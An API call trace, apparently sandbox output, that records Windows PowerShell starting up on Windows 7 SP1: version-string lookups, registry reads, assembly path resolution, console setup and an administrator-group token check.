	[0589.868] VerQueryValueW (in: pBlock=0x2c66390, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14ddf8, puLen=0x14ddf0 | out: lplpBuffer=0x14ddf8*=0x2c665b8, puLen=0x14ddf0) returned 1
	[0589.868] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0589.868] CoTaskMemAlloc (cb=0x20) returned 0x2ea5d0
	[0589.868] lstrcpyW (in: lpString1=0x2ea5d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0589.868] CoTaskMemFree (pv=0x2ea5d0) 
	[0589.868] VerQueryValueW (in: pBlock=0x2c66390, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14ddf8, puLen=0x14ddf0 | out: lplpBuffer=0x14ddf8*=0x2c665f8, puLen=0x14ddf0) returned 1
	[0589.868] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0589.868] CoTaskMemAlloc (cb=0x44) returned 0x2ee190
	[0589.868] lstrcpyW (in: lpString1=0x2ee190, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0589.868] CoTaskMemFree (pv=0x2ee190) 
	[0589.868] VerQueryValueW (in: pBlock=0x2c66390, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14ddf8, puLen=0x14ddf0 | out: lplpBuffer=0x14ddf8*=0x2c66660, puLen=0x14ddf0) returned 1
	[0589.868] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0589.868] CoTaskMemAlloc (cb=0x76) returned 0x28eef0
	[0589.868] lstrcpyW (in: lpString1=0x28eef0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0589.868] CoTaskMemFree (pv=0x28eef0) 
	[0589.869] VerQueryValueW (in: pBlock=0x2c66390, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14ddf8, puLen=0x14ddf0 | out: lplpBuffer=0x14ddf8*=0x2c666fc, puLen=0x14ddf0) returned 1
	[0589.869] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0589.869] CoTaskMemAlloc (cb=0x44) returned 0x2ee190
	[0589.869] lstrcpyW (in: lpString1=0x2ee190, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0589.869] CoTaskMemFree (pv=0x2ee190) 
	[0589.869] VerQueryValueW (in: pBlock=0x2c66390, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14ddf8, puLen=0x14ddf0 | out: lplpBuffer=0x14ddf8*=0x2c66760, puLen=0x14ddf0) returned 1
	[0589.869] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0589.869] CoTaskMemAlloc (cb=0x58) returned 0x276c20
	[0589.869] lstrcpyW (in: lpString1=0x276c20, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0589.869] CoTaskMemFree (pv=0x276c20) 
	[0589.869] VerQueryValueW (in: pBlock=0x2c66390, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14ddf8, puLen=0x14ddf0 | out: lplpBuffer=0x14ddf8*=0x2c667dc, puLen=0x14ddf0) returned 1
	[0589.869] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0589.869] CoTaskMemAlloc (cb=0x20) returned 0x2ea5d0
	[0589.869] lstrcpyW (in: lpString1=0x2ea5d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0589.869] CoTaskMemFree (pv=0x2ea5d0) 
	[0589.869] VerQueryValueW (in: pBlock=0x2c66390, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14ddf8, puLen=0x14ddf0 | out: lplpBuffer=0x14ddf8*=0x2c66484, puLen=0x14ddf0) returned 1
	[0589.869] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0589.869] CoTaskMemAlloc (cb=0x66) returned 0x2e9710
	[0589.869] lstrcpyW (in: lpString1=0x2e9710, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0589.870] CoTaskMemFree (pv=0x2e9710) 
	[0589.870] VerQueryValueW (in: pBlock=0x2c66390, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14ddf8, puLen=0x14ddf0 | out: lplpBuffer=0x14ddf8*=0x0, puLen=0x14ddf0) returned 0
	[0589.870] VerQueryValueW (in: pBlock=0x2c66390, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14ddf8, puLen=0x14ddf0 | out: lplpBuffer=0x14ddf8*=0x0, puLen=0x14ddf0) returned 0
	[0589.870] VerQueryValueW (in: pBlock=0x2c66390, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14ddf8, puLen=0x14ddf0 | out: lplpBuffer=0x14ddf8*=0x0, puLen=0x14ddf0) returned 0
	[0589.870] VerQueryValueW (in: pBlock=0x2c66390, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14ddc8, puLen=0x14ddc0 | out: lplpBuffer=0x14ddc8*=0x2c6642c, puLen=0x14ddc0) returned 1
	[0589.870] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0589.870] VerLanguageNameW (in: wLang=0x0, szLang=0x2917a0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0589.870] CoTaskMemFree (pv=0x2917a0) 
	[0589.870] VerQueryValueW (in: pBlock=0x2c66390, lpSubBlock="\\", lplpBuffer=0x14de18, puLen=0x14de10 | out: lplpBuffer=0x14de18*=0x2c663b8, puLen=0x14de10) returned 1
	[0589.879] CoTaskMemAlloc (cb=0x104) returned 0x27a530
	[0589.879] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0589.879] CoTaskMemFree (pv=0x27a530) 
	[0589.884] CoTaskMemAlloc (cb=0x104) returned 0x27a530
	[0589.884] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0589.884] CoTaskMemFree (pv=0x27a530) 
	[0589.892] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14dce8 | out: phkResult=0x14dce8*=0x2f4) returned 0x0
	[0589.893] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x14dcd8 | out: phkResult=0x14dcd8*=0x2f8) returned 0x0
	[0589.893] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14dd68 | out: phkResult=0x14dd68*=0x2fc) returned 0x0
	[0589.896] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14dcac, lpData=0x0, lpcbData=0x14dca8*=0x0 | out: lpType=0x14dcac*=0x1, lpData=0x0, lpcbData=0x14dca8*=0x56) returned 0x0
	[0589.897] CoTaskMemAlloc (cb=0x5a) returned 0x2e96a0
	[0589.897] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14dc7c, lpData=0x2e96a0, lpcbData=0x14dc78*=0x56 | out: lpType=0x14dc7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14dc78*=0x56) returned 0x0
	[0589.897] CoTaskMemFree (pv=0x2e96a0) 
	[0591.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0591.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0591.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0591.206] CoTaskMemAlloc (cb=0x104) returned 0x27a530
	[0591.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0591.206] CoTaskMemFree (pv=0x27a530) 
	[0596.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0596.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0599.062] CoTaskMemAlloc (cb=0x104) returned 0x2fa7d0
	[0599.062] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2fa7d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0599.062] CoTaskMemFree (pv=0x2fa7d0) 
	[0599.062] CoTaskMemAlloc (cb=0x104) returned 0x2fa7d0
	[0599.062] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2fa7d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0599.062] CoTaskMemFree (pv=0x2fa7d0) 
	[0600.385] CoTaskMemAlloc (cb=0x104) returned 0x2b0770
	[0600.385] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b0770, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0600.385] CoTaskMemFree (pv=0x2b0770) 
	[0600.387] CoTaskMemAlloc (cb=0x104) returned 0x2b0770
	[0600.387] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b0770, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0600.387] CoTaskMemFree (pv=0x2b0770) 
	[0600.387] CoTaskMemAlloc (cb=0x104) returned 0x2b0770
	[0600.387] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b0770, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0600.387] CoTaskMemFree (pv=0x2b0770) 
	[0604.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0604.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0605.804] CoTaskMemAlloc (cb=0x104) returned 0x27a530
	[0605.804] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0605.804] CoTaskMemFree (pv=0x27a530) 
	[0605.806] CoTaskMemAlloc (cb=0x104) returned 0x27a530
	[0605.806] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27a530, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0605.806] CoTaskMemFree (pv=0x27a530) 
	[0606.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0606.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0615.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0619.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0619.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0620.179] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0620.179] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0620.180] CoTaskMemFree (pv=0x1b7c98b0) 
	[0621.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x14d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0621.241] SetErrorMode (uMode=0x1) returned 0x1
	[0621.241] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x14dc40 | out: lpFileInformation=0x14dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0621.242] SetErrorMode (uMode=0x1) returned 0x1
	[0624.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0624.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0624.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0625.213] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0625.213] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.213] CoTaskMemFree (pv=0x1b7c98b0) 
	[0625.216] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0625.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.217] CoTaskMemFree (pv=0x1b7c98b0) 
	[0625.217] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0625.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.217] CoTaskMemFree (pv=0x1b7c98b0) 
	[0625.220] CoCreateGuid (in: pguid=0x14e008 | out: pguid=0x14e008*(Data1=0x11762b68, Data2=0xb936, Data3=0x4f19, Data4=([0]=0x9f, [1]=0xe1, [2]=0xd9, [3]=0x42, [4]=0x73, [5]=0x15, [6]=0xdc, [7]=0x5))) returned 0x0
	[0625.223] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0625.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.224] CoTaskMemFree (pv=0x1b7c98b0) 
	[0625.226] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0625.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.227] CoTaskMemFree (pv=0x1b7c98b0) 
	[0625.229] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0625.229] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.229] CoTaskMemFree (pv=0x1b7c98b0) 
	[0625.240] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0625.241] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x14dcb0 | out: lpConsoleScreenBufferInfo=0x14dcb0) returned 1
	[0625.254] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0626.168] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x14dcb0 | out: lpConsoleScreenBufferInfo=0x14dcb0) returned 1
	[0626.171] GetVersionExW (in: lpVersionInformation=0x14dc40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14dc40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0626.173] GetCurrentProcess () returned 0xffffffffffffffff
	[0626.176] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14dcd8 | out: TokenHandle=0x14dcd8*=0x314) returned 1
	[0626.180] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14dbf8 | out: TokenInformation=0x0, ReturnLength=0x14dbf8) returned 0
	[0626.181] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x257290
	[0626.181] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x257290, TokenInformationLength=0x4, ReturnLength=0x14dbf8 | out: TokenInformation=0x257290, ReturnLength=0x14dbf8) returned 1
	[0626.185] DuplicateTokenEx (in: hExistingToken=0x314, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x14dd58 | out: phNewToken=0x14dd58*=0x1bc) returned 1
	[0626.185] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14dbf8 | out: TokenInformation=0x0, ReturnLength=0x14dbf8) returned 0
	[0626.185] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2572c0
	[0626.185] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x2572c0, TokenInformationLength=0x4, ReturnLength=0x14dbf8 | out: TokenInformation=0x2572c0, ReturnLength=0x14dbf8) returned 1
	[0626.186] CheckTokenMembership (in: TokenHandle=0x1bc, SidToCheck=0x2d41138*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x14dd68 | out: IsMember=0x14dd68) returned 1
	[0626.187] CloseHandle (hObject=0x1bc) returned 1
	[0626.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0626.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0626.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0626.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0626.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0626.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0626.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0626.227] CoTaskMemAlloc (cb=0x804) returned 0x1b7d7af0
	[0626.227] GetConsoleTitleW (in: lpConsoleTitle=0x1b7d7af0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0627.030] CoTaskMemFree (pv=0x1b7d7af0) 
	[0627.057] CoTaskMemAlloc (cb=0x804) returned 0x1b7d83a0
	[0627.057] GetConsoleTitleW (in: lpConsoleTitle=0x1b7d83a0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0627.058] CoTaskMemFree (pv=0x1b7d83a0) 
